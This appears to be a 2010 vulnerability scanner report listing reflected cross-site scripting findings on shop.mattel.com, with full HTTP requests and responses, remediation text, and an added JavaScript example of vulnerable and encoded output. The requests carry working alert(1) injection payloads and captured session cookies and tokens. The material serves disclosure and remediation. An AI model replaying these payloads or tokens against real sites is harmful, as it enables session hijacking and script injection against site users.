Date: Thu, 23 Dec 2010 00:14:44 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40048
The value of the jsessionid request parameter is copied into an HTML comment. The payload 8d597--><script>alert(1)</script>d903fe711aa was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US8d597--><script>alert(1)</script>d903fe711aa HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&locale=es_US8d597--><script>alert(1)</script>d903fe711aa --> ...[SNIP]...
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24863"-alert(1)-"78eaf9b6a31 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?locale=es_US24863"-alert(1)-"78eaf9b6a31 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... = {}; }
The value of the locale request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b57"-alert(1)-"f7a8c4aca52 was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/index.jsp?locale=es_USa4b57"-alert(1)-"f7a8c4aca52 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45424
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the locale request parameter is copied into an HTML comment. The payload 2478f--><script>alert(1)</script>76d14968a7c was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp?locale=es_US2478f--><script>alert(1)</script>76d14968a7c HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:59 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45472
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <!-- === Request Query String: locale=es_US2478f--><script>alert(1)</script>76d14968a7c --> ...[SNIP]...
1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cd009--><script>alert(1)</script>6d63d6430fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp?cd009--><script>alert(1)</script>6d63d6430fa=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:51 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <!-- === Request Query String: cd009--><script>alert(1)</script>6d63d6430fa=1 --> ...[SNIP]...
1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5513"-alert(1)-"f377ef9f75a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/index.jsp?a5513"-alert(1)-"f377ef9f75a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:49 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45089
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53258"-alert(1)-"114d4ef9b54 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /product/index.jsp?productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:45 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:52 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into an HTML comment. The payload d67b6--><script>alert(1)</script>c8c1a5320e3 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/index.jsp?productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:46 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:53 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36612
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
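The two sinks above, the cp value landing in a double-quoted JavaScript string and in an HTML comment, modelled as an added example that is not code from the report or from shop.mattel.com. The vulnerable template concatenates the query string into both contexts the way the responses show; the hardened one applies a context-specific encoder to each, which is the fallback the remediation text allows when the echo cannot be removed. The template text, the variable name qs and the page structure are assumptions; the payloads are the ones the report submitted.

```javascript
// Payloads exactly as submitted in the report.
const JS_STRING_PAYLOAD = '53258"-alert(1)-"114d4ef9b54';
const COMMENT_PAYLOAD = 'd67b6--><script>alert(1)</script>c8c1a5320e3';

// Vulnerable rendering (assumed template): user data concatenated straight
// into an HTML comment and into a double-quoted JavaScript string.
function renderUnsafe(queryString) {
  return {
    comment: '<!-- === Request Query String: ' + queryString + ' -->',
    script: 'var qs = "' + queryString + '"; return qs;',
  };
}

// JavaScript string context: hex-escape every character that is not
// alphanumeric. The result can neither end the string literal nor contain
// "</script>", so it is also safe inside an inline <script> block.
function encodeForJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// HTML comment context: a comment ends at "-->" (or "--!>"), so remove the
// ability to form either by entity-encoding ">" and "-" (plus "<" and "&").
// Browsers do not decode entities inside comments, so the text stays inert
// but remains readable in the page source.
function encodeForHtmlComment(s) {
  const map = { '<': '&lt;', '>': '&gt;', '&': '&amp;', '-': '&#45;' };
  return s.replace(/[<>&-]/g, (c) => map[c]);
}

// Hardened rendering: same template, each context gets its own encoder.
function renderSafe(queryString) {
  return {
    comment: '<!-- === Request Query String: ' + encodeForHtmlComment(queryString) + ' -->',
    script: 'var qs = "' + encodeForJsString(queryString) + '"; return qs;',
  };
}

// Stand-in for the browser's script engine: run the generated script with a
// stubbed alert() and report whether it fired and what qs ended up holding.
function runScript(scriptSource) {
  let fired = false;
  const alert = () => { fired = true; return 0; };
  const value = new Function('alert', scriptSource)(alert);
  return { alertFired: fired, value };
}

// True when something other than the template's own terminator closes the comment.
function commentTerminatedEarly(commentHtml) {
  return commentHtml.indexOf('-->') !== commentHtml.length - 3;
}

// Unsafe page executes the payloads, safe page keeps them as data.
function demo() {
  return {
    unsafeScript: runScript(renderUnsafe(JS_STRING_PAYLOAD).script),   // alertFired: true
    safeScript: runScript(renderSafe(JS_STRING_PAYLOAD).script),       // alertFired: false, value === payload
    unsafeComment: commentTerminatedEarly(renderUnsafe(COMMENT_PAYLOAD).comment), // true
    safeComment: commentTerminatedEarly(renderSafe(COMMENT_PAYLOAD).comment),     // false
  };
}

console.log(demo());
```

Entity encoding is not a substitute for the script-context encoder: inside a JavaScript string, &quot; is just six literal characters, so the value no longer round-trips, whereas the hex escapes decode back to the original text. The report's own advice still stands; the encoders are for the case where the echo has to remain.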
1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /product/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload babdb--><script>alert(1)</script>332e4ffe94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/index.jsp?productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:38 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=jsx3NSTW0ThmFQdF2nz80hkG10LQN52LGC89LfycTTn9WzHlzvxm!-1434729825; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:45 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://shop.mattel.com
Path: /product/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cc08"-alert(1)-"8a2c85cf2ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /product/index.jsp?productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1 HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://www.barbie.com/videogirl/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=CyQ2NSTSyvhGDxW9mLkXPrJrLljhvJTfK4WtPV9v1cD6VrL85yf1!755340761; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:41 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 54343
